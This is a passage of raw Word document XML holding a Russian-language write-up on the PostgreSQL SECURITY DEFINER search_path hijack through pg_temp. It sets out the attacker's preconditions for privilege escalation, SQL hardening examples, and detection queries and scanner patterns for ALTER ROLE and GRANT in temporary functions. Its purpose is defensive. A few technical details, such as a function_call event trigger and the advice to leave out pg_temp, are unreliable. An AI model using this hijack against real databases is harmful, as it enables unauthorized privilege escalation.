        <w:t xml:space="preserve"> PostgreSQL resolve unqualified-имён (функций, операторов, типов) идёт по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в момент исполнения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не в момент CREATE FUNCTION. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> меняет current_user, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не меняет search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — он остаётся от вызывающего. Это намеренное поведение: search_path считается user preference, привязанной к сессии, а не к функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF1E52C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>первая</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в эффективном search_path, если не указана явно — это hardcoded поведение PostgreSQL (можно отключить только через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path = pg_catalog, ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без pg_temp). Каждая сессия имеет свой pg_temp, и любая роль имеет CREATE на свой pg_temp (это design: temp-tables, temp-functions для удобства).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1C058" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сочетание этих двух фактов — SECURITY DEFINER не меняет search_path + pg_temp всегда первая + любая роль может CREATE в pg_temp — даёт universal hijack для unqualified-имён внутри SECURITY DEFINER функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636CD771" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Защита (документированная PostgreSQL Project с конца 2010-х):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61920455" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.audit_action(user_name text, action text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD1B81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS void LANGUAGE plpgsql SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D4E98C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path = pg_catalog, pg_temp   -- ← ОБЯЗАТЕЛЬНО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511076DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC5E9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B68993" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  INSERT INTO audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC88C76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  VALUES (lower(user_name), action, now());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC196AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE8F50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158CE4CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в declaration функции — search_path внутри тела жёстко зафиксирован, начинается с pg_catalog (никакие user-функции не могут перебить системные). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> добавляется в конец (если функция нуждается в temp-таблицах), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>после</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pg_catalog — что обнуляет hijack-вектор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59326629" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Альтернатива — полная квалификация всех имён в теле функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D861CFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO public.audit_log(user, action, ts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D131DE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VALUES (pg_catalog.lower(user_name), action, pg_catalog.now());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F1AD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>второй слой защиты</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> независимый от SET search_path. Применяется в особо чувствительных функциях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E653725" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C015126" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (поведение задокументировано с PostgreSQL 8.x, не CVE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992E174" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DFFBA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Любая роль с access к БД (pg_temp всегда доступен)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5924E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   EXECUTE на SECURITY DEFINER функцию (обычно выдано PUBLIC, иначе функция бесполезна)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A7801" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A84A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия жертвы:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> owner SECURITY DEFINER функции, типично superuser или application-admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082F9652" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A67C3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дефолтный search_path (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"$user", public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Если admin поставил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>, hijack не сработает (но это редкая конфигурация).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F90FB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> существует SECURITY DEFINER функция без явного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в declaration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBE9D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SECURITY DEFINER — стандартный механизм для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A6D691" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   audit-trail wrappers (как в примере выше — функция логирует действие в защищённую таблицу)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48823D16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   permission-check functions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>check_can_access(user, resource) → bool</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E489D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   encapsulated DML-операции (atomically modify несколько таблиц с проверкой инвариантов)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE47DC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CREATE EXTENSION-функции, использующие internal схемы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA5E31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBC2D15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-вывод с regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + последующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отсутствует в declaration. Все SECURITY DEFINER функции без SET search_path — критичны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1A49B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc`-запрос для аудита</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A7EBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SELECT n.nspname, p.proname FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D1EA3"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7EFCFDFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA914F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND NOT EXISTS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53967FAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT 1 FROM unnest(p.proconfig) c WHERE c LIKE 'search_path=%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAD0D47"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3CE3392E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Runtime detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_event_trigger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>function_call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для функций, owned superuser-ом, с CHECK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_schemas(false)[1] = 'pg_temp'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — alert если pg_temp активно первая.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74157220" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc.prosrc` для функций в pg_temp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: статический сканер на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t>. Если в pg_temp у любой роли есть функция с такими операциями — она готовый payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C81C59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; не CVE, класс mis-configuration. Поведение SECURITY DEFINER + search_path задокументировано с PostgreSQL 8.x (2005). Recommendation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> присутствует в PostgreSQL Docs с тех же лет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F483BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В PostgreSQL 15 (релиз 13.10.2022) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
